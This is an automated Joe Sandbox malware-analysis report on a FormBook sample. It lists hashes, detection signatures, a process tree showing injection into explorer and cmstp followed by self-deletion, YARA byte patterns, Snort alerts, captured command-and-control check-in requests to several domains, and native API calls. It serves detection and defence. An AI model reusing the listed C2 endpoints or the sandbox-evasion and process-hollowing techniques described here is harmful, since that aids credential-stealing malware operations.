Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 20210113432.exe

Overview

General Information

Sample Name:20210113432.exe
Analysis ID:339348
MD5:13dbc9c1c5a2811ecbee5f420c9c75b6
SHA1:6b01e540d3757944b61baa187159a908e170d5ae
SHA256:ba41656ca5e0e243cff9f6a536c43998a9dbc492f5e813a0022e84359b2e0ef8
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: CMSTP Execution Process Creation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 20210113432.exe (PID: 1476 cmdline: 'C:\Users\user\Desktop\20210113432.exe' MD5: 13DBC9C1C5A2811ECBEE5F420C9C75B6)
    • 20210113432.exe (PID: 5320 cmdline: C:\Users\user\Desktop\20210113432.exe MD5: 13DBC9C1C5A2811ECBEE5F420C9C75B6)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 5300 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 6292 cmdline: /c del 'C:\Users\user\Desktop\20210113432.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.20210113432.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.20210113432.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.20210113432.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x175f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1770c:$sqlite3step: 68 34 1C 7B E1
        • 0x17628:$sqlite3text: 68 38 2A 90 C5
        • 0x1774d:$sqlite3text: 68 38 2A 90 C5
        • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
        2.2.20210113432.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.20210113432.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: CMSTP Execution Process CreationShow sources
          Source: Process startedAuthor: Nik Seetharaman: Data: Command: /c del 'C:\Users\user\Desktop\20210113432.exe', CommandLine: /c del 'C:\Users\user\Desktop\20210113432.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 5300, ProcessCommandLine: /c del 'C:\Users\user\Desktop\20210113432.exe', ProcessId: 6292

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: 20210113432.exeVirustotal: Detection: 28%Perma Link
          Source: 20210113432.exeReversingLabs: Detection: 26%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 20210113432.exeJoe Sandbox ML: detected
          Source: 2.2.20210113432.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 20210113432.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 20210113432.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmstp.pdbGCTL source: 20210113432.exe, 00000002.00000002.292959417.000000000112A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: 20210113432.exe, 00000002.00000002.293261295.000000000167F000.00000040.00000001.sdmp, cmstp.exe, 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 20210113432.exe, 00000002.00000002.293261295.000000000167F000.00000040.00000001.sdmp, cmstp.exe
          Source: Binary string: cmstp.pdb source: 20210113432.exe, 00000002.00000002.292959417.000000000112A000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 4x nop then pop edi2_2_00416C8E
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 4x nop then pop edi2_2_00417D5A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi10_2_00856C8E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi10_2_00857D5A

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 74.208.236.28:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 74.208.236.28:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 74.208.236.28:80
          Source: global trafficHTTP traffic detected: GET /dkk/?J49Tz=eln47v8hVLB&EvI=KFec6V/xGjD6cE5qsvd2LTm4Ze1Ufxo42AYbq86iepN500M2vfXbQq6XlD5K+sbe3doaSuc2kQ== HTTP/1.1Host: www.miproper.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?EvI=VuWlRtEQc0PyYNliE71gHvEq4u/XFVndbD6PF4RlFVBK20m1fz7CdpGmHTE9G7iYyzSgqX7WhA==&J49Tz=eln47v8hVLB HTTP/1.1Host: www.fordexplorerproblems.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?J49Tz=eln47v8hVLB&EvI=7pEhCqXKdTe1QojMxaT2YAvmPyLKOFb2Iw59nqg2WrUGKA2vL6+QIvazxlaHaXA0UWVS/p1klg== HTTP/1.1Host: www.southsideflooringcreations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?J49Tz=eln47v8hVLB&EvI=7pEhCqXKdTe1QojMxaT2YAvmPyLKOFb2Iw59nqg2WrUGKA2vL6+QIvazxlaHaXA0UWVS/p1klg== HTTP/1.1Host: www.southsideflooringcreations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?EvI=Pne6zO+Z3a60Au06FHOmVrHS7z/OeLQppxmg+doCWmhHZjdmG5KKLECfP4ZcwEOpNG8I7WvO0Q==&J49Tz=eln47v8hVLB HTTP/1.1Host: www.exoticorganicwine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
          Source: global trafficHTTP traffic detected: GET /dkk/?J49Tz=eln47v8hVLB&EvI=KFec6V/xGjD6cE5qsvd2LTm4Ze1Ufxo42AYbq86iepN500M2vfXbQq6XlD5K+sbe3doaSuc2kQ== HTTP/1.1Host: www.miproper.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?EvI=VuWlRtEQc0PyYNliE71gHvEq4u/XFVndbD6PF4RlFVBK20m1fz7CdpGmHTE9G7iYyzSgqX7WhA==&J49Tz=eln47v8hVLB HTTP/1.1Host: www.fordexplorerproblems.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?J49Tz=eln47v8hVLB&EvI=7pEhCqXKdTe1QojMxaT2YAvmPyLKOFb2Iw59nqg2WrUGKA2vL6+QIvazxlaHaXA0UWVS/p1klg== HTTP/1.1Host: www.southsideflooringcreations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?J49Tz=eln47v8hVLB&EvI=7pEhCqXKdTe1QojMxaT2YAvmPyLKOFb2Iw59nqg2WrUGKA2vL6+QIvazxlaHaXA0UWVS/p1klg== HTTP/1.1Host: www.southsideflooringcreations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dkk/?EvI=Pne6zO+Z3a60Au06FHOmVrHS7z/OeLQppxmg+doCWmhHZjdmG5KKLECfP4ZcwEOpNG8I7WvO0Q==&J49Tz=eln47v8hVLB HTTP/1.1Host: www.exoticorganicwine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.semaindustrial.com
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: 20210113432.exeString found in binary or memory: http://tempuri.org/_391backDataSet.xsd
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000002.623532384.0000000006870000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00419D50 NtCreateFile,2_2_00419D50
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00419E00 NtReadFile,2_2_00419E00
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00419E80 NtClose,2_2_00419E80
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00419F30 NtAllocateVirtualMemory,2_2_00419F30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949840 NtDelayExecution,LdrInitializeThunk,10_2_04949840
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949860 NtQuerySystemInformation,LdrInitializeThunk,10_2_04949860
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049499A0 NtCreateSection,LdrInitializeThunk,10_2_049499A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049495D0 NtClose,LdrInitializeThunk,10_2_049495D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_04949910
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949540 NtReadFile,LdrInitializeThunk,10_2_04949540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049496D0 NtCreateKey,LdrInitializeThunk,10_2_049496D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049496E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_049496E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949650 NtQueryValueKey,LdrInitializeThunk,10_2_04949650
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949A50 NtCreateFile,LdrInitializeThunk,10_2_04949A50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_04949660
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949780 NtMapViewOfSection,LdrInitializeThunk,10_2_04949780
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949FE0 NtCreateMutant,LdrInitializeThunk,10_2_04949FE0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949710 NtQueryInformationToken,LdrInitializeThunk,10_2_04949710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049498A0 NtWriteVirtualMemory,10_2_049498A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049498F0 NtReadVirtualMemory,10_2_049498F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949820 NtEnumerateKey,10_2_04949820
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0494B040 NtSuspendThread,10_2_0494B040
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049499D0 NtCreateProcessEx,10_2_049499D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049495F0 NtQueryInformationFile,10_2_049495F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0494AD30 NtSetContextThread,10_2_0494AD30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949520 NtWaitForSingleObject,10_2_04949520
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949950 NtQueueApcThread,10_2_04949950
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949560 NtWriteFile,10_2_04949560
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949A80 NtOpenDirectoryObject,10_2_04949A80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949610 NtEnumerateValueKey,10_2_04949610
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949A10 NtQuerySection,10_2_04949A10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949A00 NtProtectVirtualMemory,10_2_04949A00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949A20 NtResumeThread,10_2_04949A20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949670 NtQueryInformationProcess,10_2_04949670
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0494A3B0 NtGetContextThread,10_2_0494A3B0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049497A0 NtUnmapViewOfSection,10_2_049497A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0494A710 NtOpenProcessToken,10_2_0494A710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949B00 NtSetValueKey,10_2_04949B00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949730 NtQueryVirtualMemory,10_2_04949730
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949770 NtSetInformationFile,10_2_04949770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0494A770 NtOpenThread,10_2_0494A770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04949760 NtOpenProcess,10_2_04949760
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00859D50 NtCreateFile,10_2_00859D50
